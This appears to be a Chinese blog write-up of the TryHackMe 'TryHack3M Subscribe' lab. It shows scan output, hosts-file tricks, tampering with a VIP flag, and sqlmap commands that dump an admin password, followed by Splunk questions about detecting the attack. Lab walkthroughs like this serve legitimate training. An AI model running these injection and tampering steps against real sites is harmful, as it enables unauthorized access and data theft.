当前位置: 首页 > news >正文

THM TryHack3M Subscribe WP

开发

信息收集

 ┌──(kali㉿kali)-[~/fscan]└─$ ./fscan -h 10.10.133.76┌──────────────────────────────────────────────┐│    ___                              _        ││   / _ \     ___  ___ _ __ __ _  ___| | __    ││  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    ││ / /_\\_____\__ \ (__| | | (_| | (__|   <     ││ \____/     |___/\___|_|  \__,_|\___|_|\_\    │└──────────────────────────────────────────────┘Fscan Version: 2.0.0[2025-08-26 20:46:35] [INFO] 暴力破解线程数: 1                                                             [2025-08-26 20:46:35] [INFO] 开始信息扫描[2025-08-26 20:46:35] [INFO] 最终有效主机数量: 1[2025-08-26 20:46:35] [INFO] 开始主机扫描[2025-08-26 20:46:35] [INFO] 有效端口数量: 233[2025-08-26 20:46:36] [SUCCESS] 端口开放 10.10.133.76:80[2025-08-26 20:46:36] [SUCCESS] 端口开放 10.10.133.76:8000[2025-08-26 20:46:36] [SUCCESS] 端口开放 10.10.133.76:8089[2025-08-26 20:46:37] [SUCCESS] 端口开放 10.10.133.76:22[2025-08-26 20:46:37] [SUCCESS] 服务识别 10.10.133.76:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.3 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3.][2025-08-26 20:46:42] [SUCCESS] 服务识别 10.10.133.76:80 => [http][2025-08-26 20:46:46] [SUCCESS] 服务识别 10.10.133.76:8000 => [http][2025-08-26 20:46:47] [SUCCESS] 服务识别 10.10.133.76:8089 => [2025-08-26 20:46:47] [INFO] 存活端口数量: 4[2025-08-26 20:46:47] [INFO] 开始漏洞扫描[2025-08-26 20:46:47] [INFO] 加载的插件: ssh, webpoc, webtitle[2025-08-26 20:46:48] [SUCCESS] 网站标题 http://10.10.133.76       状态码:200 长度:4499   标题:Hack3M | Cyber Security Training[2025-08-26 20:46:49] [SUCCESS] 网站标题 https://10.10.133.76:8089 状态码:401 长度:453    标题:无标题[2025-08-26 20:46:49] [SUCCESS] 网站标题 http://10.10.133.76:8000  状态码:303 长度:337    标题:303 See Other 重定向地址: http://10.10.133.76:8000/zh-CN/[2025-08-26 20:46:52] [SUCCESS] 网站标题 http://10.10.133.76:8000/zh-CN/account/login?return_to=%2Fzh-CN%2F 状态码:200 长度:13710  标题:""[2025-08-26 20:48:06] [SUCCESS] 扫描已完成: 7/7

目录扫描

 [20:51:46] Starting:[20:51:50] 301 -  309B  - /js  ->  http://10.10.133.76/js/[20:51:59] 403 -  277B  - /.ht_wsr.txt[20:51:59] 403 -  277B  - /.htaccess.bak1[20:51:59] 403 -  277B  - /.htaccess.orig[20:51:59] 403 -  277B  - /.htaccess.sample[20:51:59] 403 -  277B  - /.htaccess.save[20:51:59] 403 -  277B  - /.htaccess_extra[20:51:59] 403 -  277B  - /.htaccess_orig[20:51:59] 403 -  277B  - /.htaccessOLD[20:51:59] 403 -  277B  - /.htaccess_sc[20:51:59] 403 -  277B  - /.htaccessBAK[20:51:59] 403 -  277B  - /.htaccessOLD2[20:51:59] 403 -  277B  - /.html[20:52:00] 403 -  277B  - /.htpasswd_test[20:52:00] 403 -  277B  - /.htpasswds[20:52:00] 403 -  277B  - /.httr-oauth[20:52:00] 403 -  277B  - /.htm[20:52:03] 403 -  277B  - /.php[20:52:55] 200 -    0B  - /config.php[20:52:59] 301 -  310B  - /css  ->  http://10.10.133.76/css/[20:53:00] 302 -    0B  - /dashboard.php  ->  login.php[20:53:10] 200 -   15KB - /favicon.ico[20:53:18] 301 -  310B  - /img  ->  http://10.10.133.76/img/[20:53:22] 301 -  317B  - /javascript  ->  http://10.10.133.76/javascript/[20:53:23] 200 -  521B  - /js/[20:53:27] 200 - 1000B  - /login.php[20:53:29] 302 -    0B  - /logout.php  ->  login.php[20:53:45] 301 -  317B  - /phpmyadmin  ->  http://10.10.133.76/phpmyadmin/[20:53:48] 200 -    3KB - /phpmyadmin/doc/html/index.html[20:53:49] 200 -    3KB - /phpmyadmin/[20:53:49] 200 -    3KB - /phpmyadmin/index.php[20:54:02] 403 -  277B  - /server-status[20:54:02] 403 -  277B  - /server-status/

phpmyadmin没啥用

hackme.thm 网站的邀请码

进去后第一个要求是要我们找邀请码

在这里发现了一个有意思的点,让ai解释一下(懒得打字)

 主机名检查:根据当前网页的主机名执行不同的逻辑。发送请求:如果主机名是 capture3millionsubscribers.thm,向服务器发送 POST 请求以获取邀请码。不同主机名的处理:对于 hackme.thm,打印一条提示信息。对于其他主机名,打印挑衅性的信息。

那就在自己的host添加映射关系

修改之后调用方法成功获取

 Invite Code: VkXgo:Invited30MnUsers

用户 guest@hackme.thm 的密码

输入邀请码后会显示出来密码

 太棒了,你成功了!你的用户名和密码是 guest@hackme.thm:wedidit1010

访问管理面板的安全令牌

进去后修改一下isVIP为true就能访问vip了

进去开启机器,不让看,看一眼数据包

看起来能执行,直接访问对应网页吧

看一手配置文件,拿到安全令牌和对应url

 $SECURE_TOKEN= "ACC#SS_TO_ADM1N_P@NEL";$urlAdminPanel= "http://admin1337special.hackme.thm:40009";

启用注册功能

把映射关系写到hosts文件,然后访问,但是我们不知道cookie格式,扫目录找到了一个login.php

直接输入SECURE_TOKEN,然后会进入登录页面,尝试一下之前的凭证,不让登录,尝试修改返回包一样不行

试试sql注入,好像有戏,那还说啥,sqlmap试试,成功测出来

一把梭跟着走就行

 python3 sqlmap.py -r exp.txt --dbs --batchpython3 sqlmap.py -r exp.txt -D hackme --tables --batchpython3 sqlmap.py -r exp.txt -D hackme -T users --dump --batch 

拿到admin的密码

 id | email            | name       | role   | status   | password     | username 1  | admin@hackme.thm | Admin User | admin  | 1        | adminisadm1n | admin    

进去点了一下sign up

然后无事发生,搞的有点懵逼,后面回到http://10.10.133.76/即可,会出现flag

检测

8000端口,给了账号密码,不过我的好像有点抽象,账号密码啥都没输入直接进去了

Splunk 实例中摄取了多少日志?

这里直接问ai语法,可以看到是10530

攻击者利用网站漏洞工具

其实都有提示,根据UA特征就行,试一下sqlmap,对了

总共多少攻击事件

攻击者的 IP

 83.45.212.17

攻击者的事件

 index=* source_ip="83.45.212.17"

利用表

答案就是 TryHack3M_users
http://www.dtcms.com/a/351862.html

相关文章:

  • 科技信息差(8.26)
  • 亚马逊云科技免费套餐新政解析与实战:数据分析与可视化平台
  • Slice-100K:推动AI驱动的CAD与3D打印创新的多模态数据集
  • Mysql 判断查询条件索引是否生效步骤,使用说明,示例演示
  • 集成电路学习:什么是ResNet深度残差网络
  • Redis高级篇:在Nginx、Redis、Tomcat(JVM)各环节添加缓存以实现多级缓存
  • Docker-Docker思想
  • 软考-系统架构设计师 计算机系统基础知识详细讲解
  • 今日科技热点 | AI加速变革,量子计算商用化,5G应用新机遇
  • IDEA插件推荐
  • 【prism】Prism 弹窗在 ViewModel 中控制大小的实践总结
  • 工业自动化系统架构-(规划调度执行与协调)
  • 《Java反射与动态代理详解:从原理到实践》
  • 如何让Windows桌面井井有条?
  • 模型解释性:使用 SHAPASH 在贷款被拒原因的解释性(三)
  • Java大厂面试实战:从Spring Boot到微服务架构的深度剖析
  • 【公告】模式更改
  • 县域创新升级:直面瓶颈,重塑成果转化路径
  • 缺少fuser导致oracle自动补丁失败
  • 【第三章】软件测试缺陷管理:从判断到回归的全流程实践指南​
  • 【Erdas实验教程】030:遥感图像光谱增强(彩色IHS变换)
  • 【内网渗透】CVE-2025-21420 利用cleanmgr本地提权
  • Tesseract OCR之基线拟合和单词检测
  • 从0到1详解requests接口自动化测试
  • 遥感专业快速转行 GIS 开发的指南
  • esp32_hid_device 调试遇到的一些问题
  • Python爬虫实战:爬取链家/贝壳数据预测房价走势
  • 【大模型实战篇】基于开源视觉大模型封装多模态信息提取工具
  • 第1节: 微服务架构设计篇
  • WhisperLiveKit:实时语音转文本